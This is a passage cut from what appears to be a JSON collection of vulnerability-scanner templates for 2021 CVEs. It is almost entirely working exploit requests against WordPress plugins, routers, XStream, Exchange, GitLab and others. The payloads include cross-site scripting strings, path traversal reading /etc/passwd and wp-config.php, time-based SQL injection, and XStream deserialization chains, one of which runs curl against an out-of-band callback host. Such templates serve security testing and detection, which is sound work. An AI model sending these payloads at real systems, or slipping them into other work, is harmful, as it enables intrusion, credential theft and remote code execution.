Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/logout?continue=//interact.sh"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]},{"type":"status","status":[302,301],"condition":"or"}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-21345","info":{"name":"XStream <1.4.16  - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>\n        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>\n          <packet>\n            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>\n              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>\n                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>\n                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>\n                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>\n                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>\n                      <uriProperties/>\n                      <attributeProperties/>\n                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>\n                        <getter>\n                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>\n                          <name>verify</name>\n                          <parameter-types/>\n                        </getter>\n                      </inheritedAttWildcard>\n                    </bi>\n                    <tagName/>\n                    <context>\n                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>\n                        <outer-class reference='../..'/>\n                      </marshallerPool>\n                      <nameList>\n                        <nsUriCannotBeDefaulted>\n                          <boolean>true</boolean>\n                        </nsUriCannotBeDefaulted>\n                        <namespaceURIs>\n                          <string>1</string>\n                        </namespaceURIs>\n                        <localNames>\n                          <string>UTF-8</string>\n                        </localNames>\n                      </nameList>\n                    </context>\n                  </bridge>\n                </bridge>\n                <jaxbObject class='com.sun.corba.se.impl.activation.ServerTableEntry'>\n                  <activationCmd>curl http://{{interactsh-url}}</activationCmd>\n                </jaxbObject>\n              </dataSource>\n            </message>\n            <satellites/>\n            <invocationProperties/>\n          </packet>\n        </indexMap>\n      </comparator>\n    </default>\n    <int>3</int>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n    <string>javax.xml.ws.binding.attachments.inbound</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-24510","info":{"name":"WordPress MF Gig Calendar <=1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mf_gig_calendar&action=edit&id=\"></script><script>alert(document.domain)</script><\" HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29505","info":{"name":"XStream <1.4.17 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n    <unserializable-parents/>\n    <java.util.PriorityQueue>\n        <default>\n            <size>2</size>\n        </default>\n        <int>3</int>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n        <javax.naming.ldap.Rdn_-RdnEntry>\n            <type>12345</type>\n            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\n                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\n                    <parsedMessage>true</parsedMessage>\n                    <soapVersion>SOAP_11</soapVersion>\n                    <bodyParts/>\n                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\n                        <attachmentsInitialized>false</attachmentsInitialized>\n                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\n                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>\n                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>\n                                    <names>\n                                        <string>aa</string>\n                                        <string>aa</string>\n                                    </names>\n                                    <ctx>\n                                        <environment/>\n                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>\n                                            <java.rmi.server.RemoteObject>\n                                                <string>UnicastRef</string>\n                                                <string>{{interactsh-url}}</string>\n                                                <int>1099</int>\n                                                <long>0</long>\n                                                <int>0</int>\n                                                <long>0</long>\n                                                <short>0</short>\n                                                <boolean>false</boolean>\n                                            </java.rmi.server.RemoteObject>\n                                        </registry>\n                                        <host>{{interactsh-url}}</host>\n                                        <port>1099</port>\n                                    </ctx>\n                                </candidates>\n                            </aliases>\n                        </nullIter>\n                    </sm>\n                </message>\n            </value>\n        </javax.naming.ldap.Rdn_-RdnEntry>\n    </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-35464","info":{"name":"ForgeRock OpenAM <7.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/openam/oauth2/..;/ccversion/Version"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Set-Cookie: JSESSIONID="]},{"type":"word","part":"body","words":["Version Information -","openam/ccversion/Masthead.jsp"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45043","info":{"name":"HD-Network Realtime Monitoring System 2.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /language/lang HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nCookie: s_asptitle=HD-Network%20Real-time%20Monitoring%20System%20V2.0; s_Language=../../../../../../../../../../../../../../etc/passwd; s_browsertype=2; s_ip=; s_port=; s_channum=; s_loginhandle=; s_httpport=; s_sn=; s_type=; s_devtype=\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24370","info":{"name":"WordPress Fancy Product Designer <4.6.9  - Arbitrary File Upload","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"error\":\"You need to define a directory"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39312","info":{"name":"WordPress True Ranker <2.2.4 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nsrc=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20123","info":{"name":"Draytek VigorConnect 1.6.0-B - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything","{{BaseURL}}/ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"regex","part":"body","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24274","info":{"name":"WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20090","info":{"name":"Buffalo WSR-2533DHPL2 - Path Traversal","severity":"critical"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["URLToken(cgi_path)","pppoe","wan"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44848","info":{"name":"Thinfinity VirtualUI User Enumeration","severity":"medium"},"requests":[{"raw":["GET /changePassword?username=administrator HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\"rc\":(.*?)","\"msg\":\"(.*?)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33564","info":{"name":"Ruby Dragonfly <1.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==","{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24245","info":{"name":"WordPress Stop Spammers <2021.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP+Cookie+check;\n\nlog=ad%22+accesskey%3DX+onclick%3Dalert%281%29+%22&pwd=&wp-submit=%D9%88%D8%B1%D9%88%D8%AF&redirect_to=http://localhost/wp-admin&testcookie=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["ad\" accesskey=X onclick=alert(1)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43495","info":{"name":"AlquistManager Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/asd/../../../../../../../../etc/passwd"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-21351","info":{"name":"XStream <1.4.16 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>\n      <m__DTMXRTreeFrag>\n        <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>\n          <m__size>-10086</m__size>\n          <m__mgrDefault>\n            <__overrideDefaultParser>false</__overrideDefaultParser>\n            <m__incremental>false</m__incremental>\n            <m__source__location>false</m__source__location>\n            <m__dtms>\n              <null/>\n            </m__dtms>\n            <m__defaultHandler/>\n          </m__mgrDefault>\n          <m__shouldStripWS>false</m__shouldStripWS>\n          <m__indexing>false</m__indexing>\n          <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>\n            <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>\n              <javax.sql.rowset.BaseRowSet>\n                <default>\n                  <concurrency>1008</concurrency>\n                  <escapeProcessing>true</escapeProcessing>\n                  <fetchDir>1000</fetchDir>\n                  <fetchSize>0</fetchSize>\n                  <isolation>2</isolation>\n                  <maxFieldSize>0</maxFieldSize>\n                  <maxRows>0</maxRows>\n                  <queryTimeout>0</queryTimeout>\n                  <readOnly>true</readOnly>\n                  <rowSetType>1004</rowSetType>\n                  <showDeleted>false</showDeleted>\n                  <dataSource>rmi://{{interactsh-url}}/test</dataSource>\n                  <listeners/>\n                  <params/>\n                </default>\n              </javax.sql.rowset.BaseRowSet>\n              <com.sun.rowset.JdbcRowSetImpl>\n                <default/>\n              </com.sun.rowset.JdbcRowSetImpl>\n            </fPullParserConfig>\n            <fConfigSetInput>\n              <class>com.sun.rowset.JdbcRowSetImpl</class>\n              <name>setAutoCommit</name>\n              <parameter-types>\n                <class>boolean</class>\n              </parameter-types>\n            </fConfigSetInput>\n            <fConfigParse reference='../fConfigSetInput'/>\n            <fParseInProgress>false</fParseInProgress>\n          </m__incrementalSAXSource>\n          <m__walker>\n            <nextIsRaw>false</nextIsRaw>\n          </m__walker>\n          <m__endDocumentOccured>false</m__endDocumentOccured>\n          <m__idAttributes/>\n          <m__textPendingStart>-1</m__textPendingStart>\n          <m__useSourceLocationProperty>false</m__useSourceLocationProperty>\n          <m__pastFirstElement>false</m__pastFirstElement>\n        </m__dtm>\n        <m__dtmIdentity>1</m__dtmIdentity>\n      </m__DTMXRTreeFrag>\n      <m__dtmRoot>1</m__dtmRoot>\n      <m__allowRelease>false</m__allowRelease>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>ysomap</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-34805","info":{"name":"FAUST iServer 9.0.018.018.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40969","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[firstname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-29622","info":{"name":"Prometheus  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/new/newhttp://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-45428","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n","PUT /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n\nCVE-2021-45428\n","GET /{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_2 == 201","contains(body_3, \"CVE-2021-45428\") && status_code_3 == 200"],"condition":"and"}]}]},{"id":"CVE-2021-20323","info":{"name":"Keycloak 10.0.0 - 18.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/auth/realms/master/clients-registrations/default","{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect","{{BaseURL}}/realms/master/clients-registrations/default","{{BaseURL}}/realms/master/clients-registrations/openid-connect"],"body":"{\"Test<img src=x onerror=alert(document.domain)>\":1}","stop-at-first-match":true,"headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unrecognized field \"Test<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=1&firstname=Administrator%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&lastname=Admin&username=admin\n","GET /admin/?page=user HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"Administrator\\\"><script>alert(document.domain)</script> Admin\")"],"condition":"and"}]}]},{"id":"CVE-2021-36749","info":{"name":"Apache Druid - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /druid/indexer/v1/sampler?for=connect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","druid:*:1000:1000:"],"condition":"or"}]}]},{"id":"CVE-2021-4191","info":{"name":"GitLab GraphQL API User Enumeration","severity":"medium"},"requests":[{"raw":["POST /api/graphql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept: */*\nOrigin: {{RootURL}}\nReferer: {{RootURL}}/-/graphql-explorer\n\n{\"query\":\"# Welcome to GraphiQL\\n#\\n# GraphiQL is an in-browser tool for writing, validating, and\\n# testing GraphQL queries.\\n#\\n# Type queries into this side of the screen, and you will see intelligent\\n# typeaheads aware of the current GraphQL type schema and live syntax and\\n# validation errors highlighted within the text.\\n#\\n# GraphQL queries typically start with a \\\"{\\\" character. Lines that starts\\n# with a # are ignored.\\n#\\n# An example GraphQL query might look like:\\n#\\n#     {\\n#       field(arg: \\\"value\\\") {\\n#         subField\\n#       }\\n#     }\\n#\\n# Keyboard shortcuts:\\n#\\n#  Prettify Query:  Shift-Ctrl-P (or press the prettify button above)\\n#\\n#       Run Query:  Ctrl-Enter (or press the play button above)\\n#\\n#   Auto Complete:  Ctrl-Space (or just start typing)\\n#\\n\\n{\\n  users {\\n    nodes {\\n      id\\n      name\\n      username\\n    }\\n  }\\n}\",\"variables\":null,\"operationName\":null}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"data\"","\"users\"","\"nodes\"","\"id\"","gid://"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"json","json":[".data.users.nodes[].username"]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-3377","info":{"name":"npm ansi_up v4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /\\u001B]8;;https://interact.sh\"/onmouseover=\"alert(1)\\u0007example\\u001B]8;;\\u0007 HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","words":["sh\"/onmouseover=\"alert(1)\">"]}]}]},{"id":"CVE-2021-24340","info":{"name":"WordPress Statistics <13.0.8 - Blind 